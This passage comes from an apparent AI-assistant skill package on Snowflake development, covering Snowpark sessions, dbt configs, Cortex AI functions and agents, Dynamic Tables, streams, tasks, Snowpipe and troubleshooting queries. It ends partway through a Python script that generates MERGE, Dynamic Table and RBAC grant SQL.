---
## Snowpark Python
```python
from snowflake.snowpark import Session
import os
session = Session.builder.configs({
"account": os.environ["SNOWFLAKE_ACCOUNT"],
"user": os.environ["SNOWFLAKE_USER"],
"password": os.environ["SNOWFLAKE_PASSWORD"],
"role": "my_role", "warehouse": "my_wh",
"database": "my_db", "schema": "my_schema"
}).create()
```
- Never hardcode credentials. Use environment variables or key pair auth.
- DataFrames are lazy -- executed on `collect()` / `show()`.
- Do NOT call `collect()` on large DataFrames. Process server-side with DataFrame operations.
- Use **vectorized UDFs** (10-100x faster) for batch and ML workloads.
## dbt on Snowflake
```sql
-- Dynamic table materialization (streaming/near-real-time marts):
{{ config(materialized='dynamic_table', snowflake_warehouse='transforming', target_lag='1 hour') }}
-- Incremental materialization (large fact tables):
{{ config(materialized='incremental', unique_key='event_id') }}
-- Snowflake-specific configs (combine with any materialization):
{{ config(transient=true, copy_grants=true, query_tag='team_daily') }}
```
- Do NOT use `{{ this }}` without `{% if is_incremental() %}` guard.
- Use `dynamic_table` materialization for streaming or near-real-time marts.
## Performance
- **Cluster keys**: Only for multi-TB tables. Apply on WHERE / JOIN / GROUP BY columns.
- **Search Optimization**: `ALTER TABLE t ADD SEARCH OPTIMIZATION ON EQUALITY(col);`
- **Warehouse sizing**: Start X-Small, scale up. Set `AUTO_SUSPEND = 60`, `AUTO_RESUME = TRUE`.
- **Separate warehouses** per workload (load, transform, query).
## Security
- Follow least-privilege RBAC. Use database roles for object-level grants.
- Audit ACCOUNTADMIN regularly: `SHOW GRANTS OF ROLE ACCOUNTADMIN;`
- Use network policies for IP allowlisting.
- Use masking policies for PII columns and row access policies for multi-tenant isolation.
---
## Proactive Triggers
Surface these issues without being asked when you notice them in context:
- **Missing colon prefix** in SQL stored procedures -- flag immediately, this causes "invalid identifier" at runtime.
- **`SELECT *` in Dynamic Tables** -- flag as a schema-change time bomb.
- **Deprecated Cortex function names** (`CLASSIFY_TEXT`, `SUMMARIZE`, etc.) -- suggest the current `AI_*` equivalents.
- **Task not resumed** after creation -- remind that tasks start SUSPENDED.
- **Hardcoded credentials** in Snowpark code -- flag as a security risk.
---
## Common Errors
| Error | Cause | Fix |
|-------|-------|-----|
| "Object does not exist" | Wrong database/schema context or missing grants | Fully qualify names (`db.schema.table`), check grants |
| "Invalid identifier" in procedure | Missing colon prefix on variable | Use `:variable_name` inside SQL statements |
| "Numeric value not recognized" | VARIANT field not cast | Cast explicitly: `src:field::NUMBER(10,2)` |
| Task not running | Forgot to resume after creation | `ALTER TASK task_name RESUME;` |
| DT refresh failing | Schema change upstream or tracking disabled | Use explicit columns, verify change tracking |
| TO_FILE error | Combined path as single argument | Split into two args: `TO_FILE('@stage', 'file.pdf')` |
---
## Practical Workflows
### Workflow 1: Build a Reporting Pipeline (30 min)
1. **Stage raw data**: Create external stage pointing to S3/GCS/Azure, set up Snowpipe for auto-ingest
2. **Clean with Dynamic Table**: Create DT with `TARGET_LAG = '5 minutes'` that filters nulls, casts types, deduplicates
3. **Aggregate with downstream DT**: Second DT that joins cleaned data with dimension tables, computes metrics
4. **Expose via Secure View**: Create `SECURE VIEW` for the BI tool / API layer
5. **Grant access**: Use `snowflake_query_helper.py grant` to generate RBAC statements
### Workflow 2: Add AI Classification to Existing Data
1. **Identify the column**: Find the text column to classify (e.g., support tickets, reviews)
2. **Test with AI_CLASSIFY**: `SELECT AI_CLASSIFY(text_col, ['bug', 'feature', 'question']) FROM table LIMIT 10;`
3. **Create enrichment DT**: Dynamic Table that runs `AI_CLASSIFY` on new rows automatically
4. **Monitor costs**: Cortex AI is billed per token — sample before running on full tables
### Workflow 3: Debug a Failing Pipeline
1. **Check task history**: `SELECT * FROM TABLE(INFORMATION_SCHEMA.TASK_HISTORY()) WHERE STATE = 'FAILED' ORDER BY SCHEDULED_TIME DESC;`
2. **Check DT refresh**: `SELECT * FROM TABLE(INFORMATION_SCHEMA.DYNAMIC_TABLE_REFRESH_HISTORY('my_dt')) ORDER BY REFRESH_END_TIME DESC;`
3. **Check stream staleness**: `SHOW STREAMS; -- check stale_after column`
4. **Consult troubleshooting reference**: See `references/troubleshooting.md` for error-specific fixes
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Better Approach |
|---|---|---|
| `SELECT *` in Dynamic Tables | Schema changes upstream break the DT silently | Use explicit column lists |
| Missing colon prefix in procedures | "Invalid identifier" runtime error | Always use `:variable_name` in SQL blocks |
| Single warehouse for all workloads | Contention between load, transform, and query | Separate warehouses per workload type |
| Hardcoded credentials in Snowpark | Security risk, breaks in CI/CD | Use `os.environ[]` or key pair auth |
| `collect()` on large DataFrames | Pulls entire result set to client memory | Process server-side with DataFrame operations |
| Nested subqueries instead of CTEs | Unreadable, hard to debug, Snowflake optimizes CTEs better | Use `WITH` clauses |
| Using deprecated Cortex functions | `CLASSIFY_TEXT`, `SUMMARIZE` etc. will be removed | Use `AI_CLASSIFY`, `AI_COMPLETE` etc. |
| Tasks without `WHEN SYSTEM$STREAM_HAS_DATA` | Task runs on schedule even with no new data, wasting credits | Add the WHEN clause for stream-driven tasks |
| Double-quoted identifiers | Forces case-sensitive names across all queries | Use `snake_case` unquoted identifiers |
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| `engineering/sql-database-assistant` | General SQL patterns — use for non-Snowflake databases |
| `engineering/database-designer` | Schema design — use for data modeling before Snowflake implementation |
| `engineering-team/senior-data-engineer` | Broader data engineering — pipelines, Spark, Airflow, data quality |
| `engineering-team/senior-data-scientist` | Analytics and ML — use alongside Snowpark for feature engineering |
| `engineering-team/senior-devops` | CI/CD for Snowflake deployments (Terraform, GitHub Actions) |
---
## Reference Documentation
| Document | Contents |
|----------|----------|
| `references/snowflake_sql_and_pipelines.md` | SQL patterns, MERGE templates, Dynamic Table debugging, Snowpipe, anti-patterns |
| `references/cortex_ai_and_agents.md` | Cortex AI functions, agent spec structure, Cortex Search, Snowpark |
| `references/troubleshooting.md` | Error reference, debugging queries, common fixes |
FILE:references/cortex_ai_and_agents.md
# Cortex AI and Agents Reference
Complete reference for Snowflake Cortex AI functions, Cortex Agents, Cortex Search, and Snowpark Python patterns.
## Table of Contents
1. [Cortex AI Functions](#cortex-ai-functions)
2. [Cortex Agents](#cortex-agents)
3. [Cortex Search](#cortex-search)
4. [Snowpark Python](#snowpark-python)
---
## Cortex AI Functions
### Complete Function Reference
| Function | Signature | Returns |
|----------|-----------|---------|
| `AI_COMPLETE` | `AI_COMPLETE(model, prompt)` or `AI_COMPLETE(model, conversation, options)` | STRING or OBJECT |
| `AI_CLASSIFY` | `AI_CLASSIFY(input, categories)` | OBJECT with `labels` array |
| `AI_EXTRACT` | `AI_EXTRACT(input, fields)` | OBJECT with extracted fields |
| `AI_FILTER` | `AI_FILTER(input, condition)` | BOOLEAN |
| `AI_SENTIMENT` | `AI_SENTIMENT(text)` | FLOAT (-1 to 1) |
| `AI_SUMMARIZE` | `AI_SUMMARIZE(text)` | STRING |
| `AI_TRANSLATE` | `AI_TRANSLATE(text, source_lang, target_lang)` | STRING |
| `AI_PARSE_DOCUMENT` | `AI_PARSE_DOCUMENT(file, options)` | OBJECT |
| `AI_REDACT` | `AI_REDACT(text)` | STRING |
| `AI_EMBED` | `AI_EMBED(model, text)` | ARRAY (vector) |
| `AI_AGG` | `AI_AGG(column, instruction)` | STRING |
### Deprecated Function Mapping
| Old Name (Do NOT Use) | New Name |
|-----------------------|----------|
| `COMPLETE` | `AI_COMPLETE` |
| `CLASSIFY_TEXT` | `AI_CLASSIFY` |
| `EXTRACT_ANSWER` | `AI_EXTRACT` |
| `SUMMARIZE` | `AI_SUMMARIZE` |
| `TRANSLATE` | `AI_TRANSLATE` |
| `SENTIMENT` | `AI_SENTIMENT` |
| `EMBED_TEXT_768` | `AI_EMBED` |
### AI_COMPLETE Patterns
**Simple completion:**
```sql
SELECT AI_COMPLETE('claude-4-sonnet', 'Summarize this text: ' || article_text) AS summary
FROM articles;
```
**With system prompt (conversation format):**
```sql
SELECT AI_COMPLETE(
'claude-4-sonnet',
[
{'role': 'system', 'content': 'You are a data quality analyst. Be concise.'},
{'role': 'user', 'content': 'Analyze this record: ' || record::STRING}
]
) AS analysis
FROM flagged_records;
```
**With document input (TO_FILE):**
```sql
SELECT AI_COMPLETE(
'claude-4-sonnet',
'Extract the invoice total from this document',
TO_FILE('@docs_stage', 'invoice.pdf')
) AS invoice_total;
```
### AI_CLASSIFY Patterns
Use AI_CLASSIFY instead of AI_COMPLETE for classification tasks -- it is purpose-built, cheaper, and returns structured output.
```sql
SELECT
ticket_text,
AI_CLASSIFY(ticket_text, ['billing', 'technical', 'account', 'feature_request']):labels[0]::VARCHAR AS category
FROM support_tickets;
```
### AI_EXTRACT Patterns
```sql
SELECT
AI_EXTRACT(email_body, ['sender_name', 'action_requested', 'deadline'])::OBJECT AS extracted
FROM emails;
```
### Cost Awareness
Estimate token costs before running AI functions on large tables:
```sql
-- Count tokens first
SELECT
COUNT(*) AS row_count,
SUM(AI_COUNT_TOKENS('claude-4-sonnet', text_column)) AS total_tokens
FROM my_table;
-- Process a sample first
SELECT AI_COMPLETE('claude-4-sonnet', text_column) FROM my_table SAMPLE (100 ROWS);
```
---
## Cortex Agents
### Agent Spec Structure
```sql
CREATE OR REPLACE AGENT my_db.my_schema.sales_agent
FROM SPECIFICATION $spec$
{
"models": {
"orchestration": "auto"
},
"instructions": {
"orchestration": "You are SalesBot. Help users query sales data.",
"response": "Be concise. Use tables for numeric data."
},
"tools": [
{
"tool_spec": {
"type": "cortex_analyst_text_to_sql",
"name": "SalesQuery",
"description": "Query sales metrics including revenue, orders, and customer data. Use for questions about sales performance, trends, and comparisons."
}
},
{
"tool_spec": {
"type": "cortex_search",
"name": "PolicySearch",
"description": "Search company sales policies and procedures."
}
}
],
"tool_resources": {
"SalesQuery": {
"semantic_model_file": "@my_db.my_schema.models/sales_model.yaml"
},
"PolicySearch": {
"cortex_search_service": "my_db.my_schema.policy_search_service"
}
}
}
$spec$;
```
### Agent Rules
- **Delimiter**: Use `$spec$` not `$$` to avoid conflicts with SQL dollar-quoting.
- **models**: Must be an object (`{"orchestration": "auto"}`), not an array.
- **tool_resources**: A separate top-level key, not nested inside individual tool entries.
- **Empty values in edit specs**: Do NOT include `null` or empty string values when editing -- they clear existing values.
- **Tool descriptions**: The single biggest quality factor. Be specific about what data each tool accesses and what questions it answers.
- **Testing**: Never modify production agents directly. Clone first, test, then swap.
### Calling an Agent
```sql
SELECT SNOWFLAKE.CORTEX.AGENT(
'my_db.my_schema.sales_agent',
'What was total revenue last quarter?'
);
```
---
## Cortex Search
### Creating a Search Service
```sql
CREATE OR REPLACE CORTEX SEARCH SERVICE my_db.my_schema.docs_search
ON text_column
ATTRIBUTES category, department
WAREHOUSE = search_wh
TARGET_LAG = '1 hour'
AS (
SELECT text_column, category, department, doc_id
FROM documents
);
```
### Querying a Search Service
```sql
SELECT PARSE_JSON(
SNOWFLAKE.CORTEX.SEARCH_PREVIEW(
'my_db.my_schema.docs_search',
'{
"query": "return policy for electronics",
"columns": ["text_column", "category"],
"filter": {"@eq": {"department": "retail"}},
"limit": 5
}'
)
) AS results;
```
---
## Snowpark Python
### Session Setup
```python
from snowflake.snowpark import Session
import os
session = Session.builder.configs({
"account": os.environ["SNOWFLAKE_ACCOUNT"],
"user": os.environ["SNOWFLAKE_USER"],
"password": os.environ["SNOWFLAKE_PASSWORD"],
"role": "my_role",
"warehouse": "my_wh",
"database": "my_db",
"schema": "my_schema"
}).create()
```
### DataFrame Operations
```python
# Lazy operations -- nothing executes until collect()/show()
df = session.table("events")
result = (
df.filter(df["event_type"] == "purchase")
.group_by("user_id")
.agg(F.sum("amount").alias("total_spent"))
.sort(F.col("total_spent").desc())
)
result.show() # Execution happens here
```
### Vectorized UDFs (10-100x Faster)
```python
from snowflake.snowpark.functions import pandas_udf
from snowflake.snowpark.types import StringType, PandasSeriesType
import pandas as pd
@pandas_udf(
name="normalize_email",
is_permanent=True,
stage_location="@udf_stage",
replace=True
)
def normalize_email(emails: pd.Series) -> pd.Series:
return emails.str.lower().str.strip()
```
### Stored Procedures in Python
```python
from snowflake.snowpark import Session
def process_batch(session: Session, batch_date: str) -> str:
df = session.table("raw_events").filter(F.col("event_date") == batch_date)
df.write.mode("overwrite").save_as_table("processed_events")
return f"Processed {df.count()} rows for {batch_date}"
session.sproc.register(
func=process_batch,
name="process_batch",
is_permanent=True,
stage_location="@sproc_stage",
replace=True
)
```
### Key Rules
- Never hardcode credentials. Use environment variables, key pair auth, or Snowflake's built-in connection config.
- DataFrames are lazy. Calling `.collect()` pulls all data to the client -- avoid on large datasets.
- Use vectorized UDFs over scalar UDFs for batch processing (10-100x performance improvement).
- Close sessions when done: `session.close()`.
FILE:references/snowflake_sql_and_pipelines.md
# Snowflake SQL and Pipelines Reference
Detailed patterns and anti-patterns for Snowflake SQL development and data pipeline design.
## Table of Contents
1. [SQL Patterns](#sql-patterns)
2. [Dynamic Table Deep Dive](#dynamic-table-deep-dive)
3. [Streams and Tasks Patterns](#streams-and-tasks-patterns)
4. [Snowpipe](#snowpipe)
5. [Anti-Patterns](#anti-patterns)
---
## SQL Patterns
### CTE-Based Transformations
```sql
WITH raw AS (
SELECT * FROM raw_events WHERE event_date = CURRENT_DATE()
),
cleaned AS (
SELECT
event_id,
TRIM(LOWER(event_type)) AS event_type,
user_id,
event_timestamp,
src:metadata::VARIANT AS metadata
FROM raw
WHERE event_type IS NOT NULL
),
enriched AS (
SELECT
c.*,
u.name AS user_name,
u.segment
FROM cleaned c
JOIN dim_users u ON c.user_id = u.user_id
)
SELECT * FROM enriched;
```
### MERGE with Multiple Match Conditions
```sql
MERGE INTO dim_customers t
USING (
SELECT customer_id, name, email, updated_at,
ROW_NUMBER() OVER (PARTITION BY customer_id ORDER BY updated_at DESC) AS rn
FROM staging_customers
) s
ON t.customer_id = s.customer_id AND s.rn = 1
WHEN MATCHED AND s.updated_at > t.updated_at THEN
UPDATE SET t.name = s.name, t.email = s.email, t.updated_at = s.updated_at
WHEN NOT MATCHED THEN
INSERT (customer_id, name, email, updated_at)
VALUES (s.customer_id, s.name, s.email, s.updated_at);
```
### Semi-Structured Data Patterns
**Flatten nested arrays:**
```sql
SELECT
o.order_id,
f.value:product_id::STRING AS product_id,
f.value:quantity::NUMBER AS quantity,
f.value:price::NUMBER(10,2) AS price
FROM orders o,
LATERAL FLATTEN(input => o.line_items) f;
```
**Nested flatten (array of arrays):**
```sql
SELECT
f1.value:category::STRING AS category,
f2.value:tag::STRING AS tag
FROM catalog,
LATERAL FLATTEN(input => data:categories) f1,
LATERAL FLATTEN(input => f1.value:tags) f2;
```
**OBJECT_CONSTRUCT for building JSON:**
```sql
SELECT OBJECT_CONSTRUCT(
'id', customer_id,
'name', name,
'orders', ARRAY_AGG(OBJECT_CONSTRUCT('order_id', order_id, 'total', total))
) AS customer_json
FROM customers c JOIN orders o ON c.customer_id = o.customer_id
GROUP BY c.customer_id, c.name;
```
### Window Functions
```sql
-- Running total with partitions
SELECT
department,
employee,
salary,
SUM(salary) OVER (PARTITION BY department ORDER BY hire_date) AS dept_running_total
FROM employees;
-- Detect gaps in sequences
SELECT id, seq_num,
seq_num - LAG(seq_num) OVER (ORDER BY seq_num) AS gap
FROM records
HAVING gap > 1;
```
### Time Travel
```sql
-- Query data as of a specific timestamp
SELECT * FROM my_table AT(TIMESTAMP => '2026-03-20 10:00:00'::TIMESTAMP);
-- Query data before a specific statement
SELECT * FROM my_table BEFORE(STATEMENT => '<query_id>');
-- Restore a dropped table
UNDROP TABLE accidentally_dropped_table;
```
Default retention: 1 day (standard edition), up to 90 days (enterprise+). Set per table: `DATA_RETENTION_TIME_IN_DAYS = 7`.
---
## Dynamic Table Deep Dive
### TARGET_LAG Strategy
Design your DT DAG with progressive lag -- tighter upstream, looser downstream:
```
raw_events (base table)
|
v
cleaned_events (DT, TARGET_LAG = '1 minute')
|
v
enriched_events (DT, TARGET_LAG = '5 minutes')
|
v
daily_aggregates (DT, TARGET_LAG = '1 hour')
```
### Refresh Mode Rules
| Refresh Mode | Condition |
|-------------|-----------|
| Incremental | DTs with simple SELECT, JOIN, WHERE, GROUP BY, UNION ALL on change-tracked sources |
| Full | DTs using non-deterministic functions, LIMIT, or depending on full-refresh DTs |
**Check refresh mode:**
```sql
SELECT name, refresh_mode, refresh_mode_reason
FROM TABLE(INFORMATION_SCHEMA.DYNAMIC_TABLES())
WHERE name = 'MY_DT';
```
### DT Debugging Queries
```sql
-- Check DT health and lag
SELECT name, scheduling_state, last_completed_refresh_state,
data_timestamp, DATEDIFF('minute', data_timestamp, CURRENT_TIMESTAMP()) AS lag_minutes
FROM TABLE(INFORMATION_SCHEMA.DYNAMIC_TABLES());
-- Check refresh history for failures
SELECT name, state, state_message, refresh_trigger
FROM TABLE(INFORMATION_SCHEMA.DYNAMIC_TABLE_REFRESH_HISTORY())
WHERE state = 'FAILED'
ORDER BY refresh_end_time DESC
LIMIT 10;
-- Examine graph dependencies
SELECT name, qualified_name, refresh_mode
FROM TABLE(INFORMATION_SCHEMA.DYNAMIC_TABLE_GRAPH_HISTORY());
```
### DT Constraints
- No views between two DTs in the DAG.
- `SELECT *` breaks on upstream schema changes.
- Cannot use non-deterministic functions (e.g., `CURRENT_TIMESTAMP()`) -- use a column from the source instead.
- Change tracking must be enabled on source tables: `ALTER TABLE src SET CHANGE_TRACKING = TRUE;`
---
## Streams and Tasks Patterns
### Task Trees (Parent-Child)
```sql
CREATE OR REPLACE TASK parent_task
WAREHOUSE = transform_wh
SCHEDULE = 'USING CRON 0 */1 * * * America/Los_Angeles'
AS CALL process_stage_1();
CREATE OR REPLACE TASK child_task
WAREHOUSE = transform_wh
AFTER parent_task
AS CALL process_stage_2();
-- Resume in reverse order: children first, then parent
ALTER TASK child_task RESUME;
ALTER TASK parent_task RESUME;
```
### Stream Types
| Stream Type | Use Case |
|------------|----------|
| Standard (default) | Track all DML changes (INSERT, UPDATE, DELETE) |
| Append-only | Only track INSERTs. More efficient for insert-heavy tables. |
| Insert-only (external tables) | Track new files loaded via external tables. |
```sql
-- Append-only stream for event log tables
CREATE STREAM event_stream ON TABLE events APPEND_ONLY = TRUE;
```
### Serverless Tasks
```sql
-- No warehouse needed. Snowflake manages compute automatically.
CREATE OR REPLACE TASK lightweight_task
USER_TASK_MANAGED_INITIAL_WAREHOUSE_SIZE = 'XSMALL'
SCHEDULE = '5 MINUTE'
AS INSERT INTO audit_log SELECT CURRENT_TIMESTAMP(), 'heartbeat';
```
---
## Snowpipe
### Auto-Ingest Setup (S3)
```sql
CREATE OR REPLACE PIPE my_pipe
AUTO_INGEST = TRUE
AS COPY INTO raw_table
FROM @my_s3_stage
FILE_FORMAT = (TYPE = 'JSON', STRIP_NULL_VALUES = TRUE);
```
Configure the S3 event notification to point to the pipe's SQS queue:
```sql
SHOW PIPES LIKE 'my_pipe';
-- Use the notification_channel value for S3 event config
```
### Snowpipe Monitoring
```sql
-- Check pipe status
SELECT SYSTEM$PIPE_STATUS('my_pipe');
-- Recent load history
SELECT * FROM TABLE(INFORMATION_SCHEMA.COPY_HISTORY(
TABLE_NAME => 'raw_table',
START_TIME => DATEADD(HOUR, -24, CURRENT_TIMESTAMP())
));
```
---
## Anti-Patterns
| Anti-Pattern | Why It's Bad | Fix |
|-------------|-------------|-----|
| `SELECT *` in production | Scans all columns, breaks on schema changes | Explicit column list |
| Double-quoted identifiers | Creates case-sensitive names requiring constant quoting | Use `snake_case` without quotes |
| `ORDER BY` without `LIMIT` | Sorts entire result set for no reason | Add `LIMIT` or remove `ORDER BY` |
| Single warehouse for everything | Workloads compete for resources | Separate warehouses per workload |
| `FLOAT` for money | Rounding errors | `NUMBER(19,4)` or integer cents |
| Missing `RESUME` after task creation | Task never runs | Always `ALTER TASK ... RESUME` |
| `CURRENT_TIMESTAMP()` in DT query | Forces full refresh mode | Use a timestamp column from the source |
| Scanning VARIANT without casting | "Numeric value not recognized" errors | Always cast: `col:field::TYPE` |
FILE:references/troubleshooting.md
# Snowflake Troubleshooting Reference
Common errors, debugging queries, and resolution patterns for Snowflake development.
## Table of Contents
1. [Error Reference](#error-reference)
2. [Debugging Queries](#debugging-queries)
3. [Performance Diagnostics](#performance-diagnostics)
---
## Error Reference
### SQL Errors
| Error | Cause | Fix |
|-------|-------|-----|
| "Object 'X' does not exist or not authorized" | Wrong database/schema context, missing grants, or typo | Fully qualify: `db.schema.table`. Check `SHOW GRANTS ON TABLE`. |
| "Invalid identifier 'VAR'" in procedure | Missing colon prefix on variable in SQL procedure | Use `:var_name` inside SELECT/INSERT/UPDATE/DELETE/MERGE |
| "Numeric value 'X' is not recognized" | VARIANT field accessed without type cast | Always cast: `src:field::NUMBER(10,2)` |
| "SQL compilation error: ambiguous column name" | Same column name in multiple joined tables | Use table aliases: `t.id`, `s.id` |
| "Number of columns in insert does not match" | INSERT column count mismatch with VALUES | Verify column list matches value list exactly |
| "Division by zero" | Dividing by a column that contains 0 | Use `NULLIF(divisor, 0)` or `IFF(divisor = 0, NULL, ...)` |
### Pipeline Errors
| Error | Cause | Fix |
|-------|-------|-----|
| Task not running | Created but not resumed | `ALTER TASK task_name RESUME;` |
| DT stuck in FAILED state | Query error or upstream dependency issue | Check `DYNAMIC_TABLE_REFRESH_HISTORY()` for error messages |
| DT shows full refresh instead of incremental | Non-deterministic function or unsupported pattern | Check `refresh_mode_reason` in `INFORMATION_SCHEMA.DYNAMIC_TABLES()` |
| Stream shows no data | Stream was consumed or table was recreated | Verify stream is on the correct table, check `STALE_AFTER` |
| Snowpipe not loading files | SQS notification misconfigured or file format mismatch | Check `SYSTEM$PIPE_STATUS()`, verify notification channel |
| "UPSTREAM_FAILED" on DT | A DT dependency upstream has a refresh failure | Fix the upstream DT first, then downstream will recover |
### Cortex AI Errors
| Error | Cause | Fix |
|-------|-------|-----|
| "Function X does not exist" | Using deprecated function name | Use new `AI_*` names (e.g., `AI_CLASSIFY` not `CLASSIFY_TEXT`) |
| TO_FILE error | Single argument instead of two | `TO_FILE('@stage', 'file.pdf')` -- two separate arguments |
| Agent returns empty or wrong results | Poor tool descriptions or wrong semantic model | Improve tool descriptions, verify semantic model covers the question |
| "Invalid specification" on agent | JSON structure error in spec | Check: `models` is object not array, `tool_resources` is top-level, no trailing commas |
---
## Debugging Queries
### Query History
```sql
-- Find slow queries in the last 24 hours
SELECT query_id, query_text, execution_status,
total_elapsed_time / 1000 AS elapsed_sec,
bytes_scanned / (1024*1024*1024) AS gb_scanned,
rows_produced, warehouse_name
FROM TABLE(INFORMATION_SCHEMA.QUERY_HISTORY(
END_TIME_RANGE_START => DATEADD(HOUR, -24, CURRENT_TIMESTAMP()),
RESULT_LIMIT => 50
))
WHERE total_elapsed_time > 30000 -- > 30 seconds
ORDER BY total_elapsed_time DESC;
```
### Dynamic Table Health
```sql
-- Overall DT status
SELECT name, scheduling_state, last_completed_refresh_state,
data_timestamp,
DATEDIFF('minute', data_timestamp, CURRENT_TIMESTAMP()) AS lag_minutes
FROM TABLE(INFORMATION_SCHEMA.DYNAMIC_TABLES())
ORDER BY lag_minutes DESC;
-- Recent failures
SELECT name, state, state_message, refresh_trigger,
DATEDIFF('second', refresh_start_time, refresh_end_time) AS duration_sec
FROM TABLE(INFORMATION_SCHEMA.DYNAMIC_TABLE_REFRESH_HISTORY())
WHERE state = 'FAILED'
ORDER BY refresh_end_time DESC
LIMIT 20;
```
### Stream Status
```sql
-- Check stream freshness
SHOW STREAMS;
-- Check if stream has data
SELECT SYSTEM$STREAM_HAS_DATA('my_stream');
```
### Task Monitoring
```sql
-- Check task run history
SELECT name, state, error_message,
scheduled_time, completed_time,
DATEDIFF('second', scheduled_time, completed_time) AS duration_sec
FROM TABLE(INFORMATION_SCHEMA.TASK_HISTORY())
WHERE name = 'MY_TASK'
ORDER BY scheduled_time DESC
LIMIT 20;
```
### Grants Debugging
```sql
-- What grants does a role have?
SHOW GRANTS TO ROLE my_role;
-- What grants exist on an object?
SHOW GRANTS ON TABLE my_db.my_schema.my_table;
-- Who has ACCOUNTADMIN?
SHOW GRANTS OF ROLE ACCOUNTADMIN;
```
---
## Performance Diagnostics
### Warehouse Utilization
```sql
-- Warehouse load over time
SELECT start_time, warehouse_name,
avg_running, avg_queued_load, avg_blocked
FROM TABLE(INFORMATION_SCHEMA.WAREHOUSE_LOAD_HISTORY(
DATE_RANGE_START => DATEADD(HOUR, -24, CURRENT_TIMESTAMP())
))
WHERE warehouse_name = 'MY_WH'
ORDER BY start_time DESC;
```
### Clustering Health
```sql
-- Check clustering depth (lower is better)
SELECT SYSTEM$CLUSTERING_INFORMATION('my_table', '(date_col, region)');
```
### Storage Costs
```sql
-- Table storage usage
SELECT table_name, active_bytes / (1024*1024*1024) AS active_gb,
time_travel_bytes / (1024*1024*1024) AS time_travel_gb,
failsafe_bytes / (1024*1024*1024) AS failsafe_gb
FROM INFORMATION_SCHEMA.TABLE_STORAGE_METRICS
WHERE table_schema = 'MY_SCHEMA'
ORDER BY active_bytes DESC;
```
FILE:scripts/snowflake_query_helper.py
#!/usr/bin/env python3
"""
Snowflake Query Helper
Generate common Snowflake SQL patterns: MERGE upserts, Dynamic Table DDL,
and RBAC grant statements. Outputs ready-to-use SQL that follows Snowflake
best practices.
Usage:
python snowflake_query_helper.py merge --target customers --source stg_customers --key id --columns name,email
python snowflake_query_helper.py dynamic-table --name cleaned_events --warehouse transform_wh --lag "5 minutes"
python snowflake_query_helper.py grant --role analyst --database analytics --schemas public --privileges SELECT,USAGE
python snowflake_query_helper.py merge --target t --source s --key id --columns a,b --json
"""
import argparse
import json
import sys
import textwrap
from typing import List, Optional
def generate_merge(
target: str,
source: str,
key: str,
columns: List[str],
schema: Optional[str] = None,
) -> str:
"""Generate a MERGE (upsert) statement following Snowflake best practices."""
prefix = f"{schema}." if schema else ""
t = f"{prefix}{target}"
s = f"{prefix}{source}"
# Filter out updated_at from user columns to avoid duplicates
merge_cols = [col for col in columns if col != "updated_at"]
update_sets = ",\n ".join(
f"t.{col} = s.{col}" for col in merge_cols
)
update_sets += ",\n t.updated_at = CURRENT_TIMESTAMP()"
insert_cols = ", ".join([key] + merge_cols + ["updated_at"])
insert_vals = ", ".join(
[f"s.{key}"] + [f"s.{col}" for col in merge_cols] + ["CURRENT_TIMESTAMP()"]
)
return textwrap.dedent(f"""\
MERGE INTO {t} t
USING {s} s
ON t.{key} = s.{key}
WHEN MATCHED THEN
UPDATE SET
{update_sets}
WHEN NOT MATCHED THEN
INSERT ({insert_cols})
VALUES ({insert_vals});""")
def generate_dynamic_table(
name: str,
warehouse: str,
lag: str,
source: Optional[str] = None,
columns: Optional[List[str]] = None,
schema: Optional[str] = None,
) -> str:
"""Generate a Dynamic Table DDL with best-practice defaults."""
prefix = f"{schema}." if schema else ""
full_name = f"{prefix}{name}"
src = source or "<source_table>"
col_list = ", ".join(columns) if columns else "<col1>, <col2>, <col3>"
return textwrap.dedent(f"""\
CREATE OR REPLACE DYNAMIC TABLE {full_name}
TARGET_LAG = '{lag}'
WAREHOUSE = {warehouse}
AS
SELECT {col_list}
FROM {src}
WHERE 1=1; -- Add your filter conditions
-- Verify refresh mode (incremental is preferred):
-- SELECT name, refresh_mode, refresh_mode_reason
-- FROM TABLE(INFORMATION_SCHEMA.DYNAMIC_TABLES())
-- WHERE name = '{name.upper()}';""")
def generate_grants(
role: str,
database: str,
schemas: List[str],
privileges: List[str],
) -> str:
"""Generate RBAC grant statements following least-privilege principles."""
lines = [f"-- RBAC grants for role: {role}"]
lines.append(f"-- Generated following least-privilege principles")
lines.append("")
# Database-level
lines.append(f"GRANT USAGE ON DATABASE {database} TO ROLE {role};")
lines.append("")
for schema in schemas:
fq_schema = f"{database}.{schema}"
lines.append(f"-- Schema: {fq_schema}")
lines.append(f"GRANT USAGE ON SCHEMA {fq_schema} TO ROLE {role};")
for priv in privileges:
p = priv.strip().upper()
if p == "USAGE":
continue # Already granted above
elif p == "SELECT":
lines.append(
f"GRANT SELECT ON ALL TABLES IN SCHEMA {fq_schema} TO ROLE {role};"
)
lines.append(
f"GRANT SELECT ON FUTURE TABLES IN SCHEMA {fq_schema} TO ROLE {role};"
)
lines.append(
f"GRANT SELECT ON ALL VIEWS IN SCHEMA {fq_schema} TO ROLE {role};"
)
lines.append(
f"GRANT SELECT ON FUTURE VIEWS IN SCHEMA {fq_schema} TO ROLE {role};"
)
elif p in ("INSERT", "UPDATE", "DELETE", "TRUNCATE"):
lines.append(
f"GRANT {p} ON ALL TABLES IN SCHEMA {fq_schema} TO ROLE {role};"
)
lines.append(
f"GRANT {p} ON FUTURE TABLES IN SCHEMA {fq_schema} TO ROLE {role};"
)
elif p == "CREATE TABLE":
lines.append(
f"GRANT CREATE TABLE ON SCHEMA {fq_schema} TO ROLE {role};"
)
elif p == "CREATE VIEW":
lines.append(
f"GRANT CREATE VIEW ON SCHEMA {fq_schema} TO ROLE {role};"
)
else:
lines.append(
f"GRANT {p} ON SCHEMA {fq_schema} TO ROLE {role};"
)
lines.append("")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="Generate common Snowflake SQL patterns",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent("""\
Examples:
%(prog)s merge --target customers --source stg --key id --columns name,email
%(prog)s dynamic-table --name clean_events --warehouse wh --lag "5 min"
%(prog)s grant --role analyst --database db --schemas public --privileges SELECT
"""),
)
parser.add_argument(
"--json", action="store_true", help="Output as JSON instead of raw SQL"
)
subparsers = parser.add_subparsers(dest="command", help="SQL pattern to generate")
# MERGE subcommand
merge_p = subparsers.add_parser("merge", help="Generate MERGE (upsert) statement")
merge_p.add_argument("--target", required=True, help="Target table name")
